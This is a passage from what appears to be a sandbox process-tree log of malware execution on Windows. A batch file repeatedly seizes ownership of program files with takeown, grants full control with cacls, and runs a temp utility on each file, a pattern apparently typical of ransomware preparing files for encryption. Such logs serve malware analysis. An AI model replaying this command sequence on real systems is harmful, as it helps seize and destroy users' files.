    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "can.hyp" -nobanner
    3⤵
    PID:852
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "can.hyp" -nobanner
      4⤵
      PID:1480
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:300
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""
  2⤵
  PID:1284
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"
    3⤵
    PID:748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "usa37.hyp" -nobanner
    3⤵
    PID:1072
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "usa37.hyp" -nobanner
      4⤵
      PID:796
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1476
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""
  2⤵
  PID:212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C
    3⤵
    PID:916
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "ICELAND.TXT" -nobanner
    3⤵
    PID:564
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "ICELAND.TXT" -nobanner
      4⤵
      PID:204
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1604
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""
  2⤵
  PID:884
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C
    3⤵
    PID:236
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "CP1254.TXT" -nobanner
    3⤵
    PID:1484
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "CP1254.TXT" -nobanner
      4⤵
      PID:1616
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1844
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui""
  2⤵
  PID:852
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:1100
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:2004
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:784
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Windows Mail\ja-JP\WinMail.exe.mui""
  2⤵
  PID:1328
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\ja-JP\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1284
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\ja-JP\WinMail.exe.mui"
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:916
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:1624
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""
  2⤵
  PID:2040
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"
    3⤵
    PID:828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:1912
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:1064
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1484
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""
  2⤵
  PID:1844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:364
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:748
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1100
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
  2⤵
  PID:784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
    3⤵
    PID:1476
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
    3⤵
    - Modifies file permissions
    PID:1284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "AdobeID.pdf" -nobanner
    3⤵
    PID:556
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "AdobeID.pdf" -nobanner
      4⤵
      PID:664
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1560
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""
  2⤵
  PID:996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:1204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"
    3⤵
    PID:224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:236
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "classes.jsa" -nobanner
      4⤵
      PID:828
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1064
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:1152
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    PID:216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "background.png" -nobanner
    3⤵
    PID:1352
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "background.png" -nobanner
      4⤵
      PID:220
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:748
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui""
  2⤵
  PID:340
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui"
    3⤵
    - Modifies file permissions
    PID:1908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    PID:964
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      PID:1412
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\es-ES\JNTFiltr.dll.mui""
  2⤵
  PID:916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1628
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\JNTFiltr.dll.mui"
    3⤵
    PID:1184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    PID:224
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      PID:1616
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1912
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui""
  2⤵
  PID:616
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui" /E /G Admin:F /C
    3⤵
    PID:884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui"
    3⤵
    - Modifies file permissions
    PID:300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    PID:1880
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "Journal.exe.mui" -nobanner
      4⤵
      PID:1900
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:364
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\it-IT\PDIALOG.exe.mui""
  2⤵
  PID:1604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:852
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\PDIALOG.exe.mui"
    3⤵
    PID:1476
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    PID:1720
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      PID:1624
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\Templates\blank.jtp""
  2⤵
  PID:936
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\blank.jtp" /E /G Admin:F /C
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\blank.jtp"
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "blank.jtp" -nobanner
    3⤵
    PID:208
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "blank.jtp" -nobanner
      4⤵
      PID:236
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:876
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp""
  2⤵
  PID:784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp" /E /G Admin:F /C
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp"
    3⤵
    PID:216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "To_Do_List.jtp" -nobanner
    3⤵
    PID:568
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "To_Do_List.jtp" -nobanner
      4⤵
      PID:1352
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1880
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Mail\it-IT\WinMail.exe.mui""
  2⤵
  PID:364
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\it-IT\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1152
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\it-IT\WinMail.exe.mui"
    3⤵
    PID:852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:1476
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:964
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1720
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:1176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1204
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:228
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:828
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  PID:876
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:796
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1824
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:1900
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""
  2⤵
  PID:792
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C
    3⤵
    PID:1156
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "MyriadCAD.otf" -nobanner
    3⤵
    PID:1152
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "MyriadCAD.otf" -nobanner
      4⤵
      PID:1908
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:664
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""
  2⤵
  PID:1608
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C
    3⤵
    PID:364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "create_form.gif" -nobanner
    3⤵
    PID:1184
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "create_form.gif" -nobanner
      4⤵
      PID:1332
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1712
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""
  2⤵
  PID:568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"
    3⤵
    - Modifies file permissions
    PID:232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "info.gif" -nobanner
    3⤵
    PID:1156
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "info.gif" -nobanner
      4⤵
      PID:1680
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1908
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""
  2⤵
  PID:1476
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:916
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"
    3⤵
    - Modifies file permissions
    PID:1028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "review_same_reviewers.gif" -nobanner
    3⤵
    PID:364
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "review_same_reviewers.gif" -nobanner
      4⤵
      PID:1092
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1604
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""
  2⤵
  PID:1332
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"
    3⤵
    PID:224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "trash.gif" -nobanner
    3⤵
    PID:1100
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "trash.gif" -nobanner
      4⤵
      PID:884
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""
  2⤵
  PID:1392
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"
    3⤵
    - Modifies file permissions
    PID:596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
    3⤵
    PID:1152
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
      4⤵
      PID:1908
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:748
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""
  2⤵
  PID:1720
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:1628
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"
    3⤵
    PID:328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "MyriadPro-Regular.otf" -nobanner
    3⤵
    PID:1204
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "MyriadPro-Regular.otf" -nobanner
      4⤵
      PID:1604
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1476
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""
  2⤵
  PID:1176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\takeown.exe
